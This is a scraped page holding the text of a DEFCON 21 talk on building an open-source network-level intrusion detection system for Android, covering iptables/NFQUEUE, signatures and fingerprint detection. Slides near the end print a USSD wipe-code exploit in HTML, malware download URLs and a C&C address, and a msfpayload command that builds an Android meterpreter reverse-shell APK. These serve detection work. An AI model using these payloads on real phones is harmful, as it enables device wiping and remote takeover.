Building an Android IDS on Network Level - DEFCON 21

10,078 views

Published on

BUILDING AN ANDROID IDS ON NETWORK LEVEL at DEFCON 21 by JAIME SANCHEZ

More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com

Being popular is not always a good thing and hereís why. As mobile devices grow in popularity, so do the incentives for attackers. Mobile malware and threats are clearly on the rise, as attackers experiment with new business models by targeting mobile phones. Nowadays, several behavior-based malware analysis and detection techniques for mobile threats have been proposed for mobile devices. We'll show how we built a new detection framework that will be the first open source Android IDS on network level.

This open source network-based intrusion detection system and network-based intrusion protection system has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks, featuring: Protocol analysis, Content searching and Content matching.

In IDS/IPS mode, the program will monitor network traffic and analyze it against a rule set defined by the user, and then perform a specific action based on what has been identified. With the help of custom build signatures, the framework can also be used to detect probes or attacks designed for mobile devices, fool and cheat operating system fingerprinting attempts (like nmap or p0f), server message block probes, etc.

Published in: Technology
  • hai jaime i want install androids in my smartphone.where i can download androids ?.androids free or not ??
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Building an Android IDS on Network Level - DEFCON 21

  1. 1. BUILDING AN ANDROID IDS ON NETWORK LEVEL Jaime Sanchez @segofensiva http://www.seguridadofensiva.com jsanchez@seguridadofensiva.com
  2. 2. 2 $  WHO  I  AM   §  Passionate  about  computer  security. §  Computer  Engineering  degree  and  an  Execu7ve   MBA.   §  In  my  free  7me  I  conduct  research  on  security   and  work  as  an  independent  consultant. §  I’m  from  Spain;  We’re  sexy  and  you  know  it. §    Other  conferences: §  RootedCON  in  Spain §  Nuit  Du  Hack  in  Paris   §  Black  Hat  Arsenal  USA §  Next  months:  DerbyCON  and  Hack7vity. BUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21
  3. 3. 3 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL FIRST  TIME  IN  LAS  VEGAS  !!
  4. 4. 4 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL §  Being  popular  is  not  always  a  good  thing. §  Mobile  malware  and  threats  are  clearly  on  the  rise. §  Over  100  million  Android  phones  shipped  in  the  second  quarter  of   2012  alone. §    Targets  this  large  are  difficult  for  aNackers  to  resist!   WHY?
  5. 5. 5 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL USSD  EXPLOIT WEBKIT  VULNERABILITIES TARGETED  MALWARE !!!  METERPRETER  FOR   ANDROID  !!!
  6. 6. 6 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL §   In   order   to   analyze   the   traffic   flows   we’ll   create   a   VPN   tunnel   between  our  Android  device  and  our  computer. §   Configure   and   launch   snort   on   the   remote   machine   to   detect   suspicious  traffic. §     We   can   also   use   tools   like   tcpdump   to   capture   traffic   for   later   analysis. FIRST  APPROACH VPN eth0:WiFi rmnet0: 3G snort tcpdump
  7. 7. 7 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL PROBLEMS
  8. 8. 8 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL CONTINUED  MY  LIFE  ... §  OSfooler  is  a  pracIcal  approach  presented  at  Black  Hat  Arsenal  USA   2013.  It  can  be  used  to  detect  and  defeat  acIve  and  passive  remote  OS   fingerprinIng  from  tools  like  nmap,  p0f  or  commercial  appliances. FUCKYEAH!!
  9. 9. KERNEL  SPACE USER  SPACE §   KERNEL   SPACE   is   strictly   reserved   for   running   the   kernel,   kernel   extensions,  and  most  device  drivers.   §  USER  SPACE  usually  refers  to  the  various  programs  and  libraries  that   the   operaIng   system  uses  to  interact  with  the  kernel:  soQware  that   performs  input/output,  manipulates  file  system,  objects,  etc. How  i  met  your  packetFrom  kernel  Space  to  user  Heaven 9 FROM KERNEL SPACE TO USER HEAVEN NUIT DU HACK 2013 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21 VS
  10. 10. 10 How Imet your packets How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21
  11. 11. NIC  Memory DMA  EngineInterrupt Incoming  Packet Ring Buffer Interrupt Handler NIC Memory Kernel Packet  Data IP  Layer TCP  Process TCP  recv  Buffer APPLICATION DEVICE  DRIVER KERNEL  SPACE USER  SPACE Poll  List soirq tcp_v4_rcv() Pointer  to Device Socket Backlog ip_rcv() read() locally  des7ned  packets  must  pass  the   INPUT  chains  to  reach  listening  sockets INPUT FORWARD PREROUTING MANGLECONNTRACK FILTER forwarded  and  accepted  packets Inbound  Packets forwarded   packets local packets How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21
  12. 12. How  i  met  your  packetFrom  kernel  Space  to  user  Heaven   §  A  target  extension  consists   of   a  KERNEL  MODULE,  and  an  opIonal   extension  to  iptables  to  provide  new  command  line  opIons. §  There  are  several  extensions  in  the  default  NeVilter  distribuIon: 12 FROM KERNEL SPACE TO USER HEAVEN NUIT DU HACK 2013 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21
  13. 13. §  For  this  to  be  useful,  two  further  components  are  required: • a   QUEUE   HANDLER   which   deals   with   the   actual   mechanics   of   passing  packets  between  the  kernel  and  userspace • a   USERSPACE   APPLICATION   to   receive,   possibly   manipulate,   and   issue  verdicts  on  packets. §  The  default  value  for  the  maximum  queue  length  is  1024.  Once  this   limit  is   reached,   new   packets   will   be   dropped  unIl   the   length   of   the   queue  falls  below  the  limit  again.   $ iptables -A INPUT -j NFQUEUE --queue-num 0 DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL
  14. 14. 14 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL §   I   need   to   process   traffic   before   being  processed  inside  my  Android   device. §  I  can  redirect  all  network  packet   from  Kernel  Space  to  User  Space §  I  can  do  whatever  I  want  with  the   packets:   analyze,   process,   modify   them §  This  is  done  in  Real-­‐7me. SUMMARY
  15. 15. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL AndroIDS §   Create   an   open   source   network-­‐based   intrusion   detecIon   system   (IDS)   and   network-­‐based   intrusion   protecIon  system     (IPS)   has   the   ability   to   perform   real-­‐Ime   traffic   analysis   and   packet   logging   on   Internet  Protocol  (IP)  networks: §  It  should  feature: §  Protocol  analysis §  Content  searching §  Content  matching
  16. 16. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL IDS  ARCHITECTURE:  SENSOR §   Runs   conInuously   without   human   supervision  and  feature: §  Analyze  traffic §  Send  push  alerts  to  the  Android  device   in  order  to  warn  the  user  about  the  threat §   Report   to   Logging   Server   Custom   reacIve  acIons: §  Drop  specific  packet §  Add  new  rule  in  iptables  firewall §  Launch  script  /  module §   Sync   aaack   signatures   to   keep   them   updated. §  It  should  impose  minimal  overhead.
  17. 17. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL IDS  ARCHITECTURE:  SERVER §   The   server   is   running   inside   a   Linux   Box,   and   is   receiving   all   the   messages  the  Android  sensor  is  sending. §  Server  is  responsible  for: §  Send  signatures  to  remote  devices §  Store  events  in  database §  Detects  staIsIcal  anomalies  &  analysis  real-­‐Ime. Android Device Internet Firewall IDS  Server  & Database Web Interface
  18. 18. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL PROTOCOL  ANALYSIS LOOKS  LIKE  I  PICKED  THE  WRONG  WEEK TO  QUIT  SNIFFING  PACKETS
  19. 19. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL EXAMPLE   §  Packet  with  FIN,  SYN,  PUSH  and  URG  flags  ac7ve.   §  Report  to  the  Central  Logger  and  DROP  the  packet.
  20. 20. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL REMOTE  OS  FINGERPRINTING §  Detect  and  drop  packet  sent  from  well-­‐known  scanning  tools. §  nmap  OS  fingerprin7ng  works  by  sending  up  to  16  TCP,  UDP,  and  ICMP  probes   to  known  open  and  closed  ports  of  the  target  machine. SEQUENCE  GENERATION  (SEQ,  OPS,  WIN  &  T1) ICMP  ECHO  (IE) TCP  EXPLICIT  CONGESTION  NOTIFICATION  (ECN) TCP  T2-­‐T7 UDP
  21. 21. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL PATTERN  MATCHING I’M  WATCHING  YOU...
  22. 22. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL SIGNATURE  FORMAT §  With  the  help  of  custom  build  signatures,  the  framework  can  also  be   used  to  detect  probes  or  aaacks  designed  for  mobile  devices   §  Useful  signatures  from  Snort  and  Emerging  Threats §  Convert  snort-­‐like  rules  to  a  friendly  format:
  23. 23. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL USSD  EXPLOIT §  A  USSD  code  is  entered  into  phones  to  perform   acIons. §   They  are   mainly   used  by   network   operators   to   provide   customers   with   easy   access   to   pre-­‐ configured  services,  including: §  call-­‐forwarding §  balance  inquiries §  mulIple  SIM  funcIons. §  The  HTML  code  to  execute  such  an  acIon  is  as  follows: <a  href="tel:xyz">Click  here  to  call</a> §  Example  exploit: <frameset>  <frame  src="tel:*2767*3855#"  />  </  frameset>
  24. 24. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL WEB  SIGNATURES
  25. 25. DEFCON 21 How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL MALWARE §  ANDR.TROJAN.SMSSEND §  Download  from: §  hxxp://adobeflashplayer-­‐up.ru/?a=RANDOM_CHARACTERS  –  93.170.107.184   §  hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS  –  93.170.107.184 §  hxxp://browsernew-­‐update.ru/?a=RANDOM_CHARACTERS  –  93.170.107.184 §  Once  executed,  connect  to  C&C:    gaga01.net/rq.php §oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX §  Search  paaern:  rq.php §  METERPRETER §    It  features  command  history,  tab  compleIon,   channels,  and  more. §  Let’s  try: $  msfpayload  android/meterpreter/reverse_tcp  LHOST=192.168.0.20  R  >  meter.apk $  file  meter.apk        meter.apk:  Zip  archive  data,  at  least  v2.0  to  extract
  26. 26. T  H  A  N  K      Y  O  U  ! How  i  met  your  packetBUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21 Jaime  Sánchez @segofensiva jsanchez@segofensiva.com

×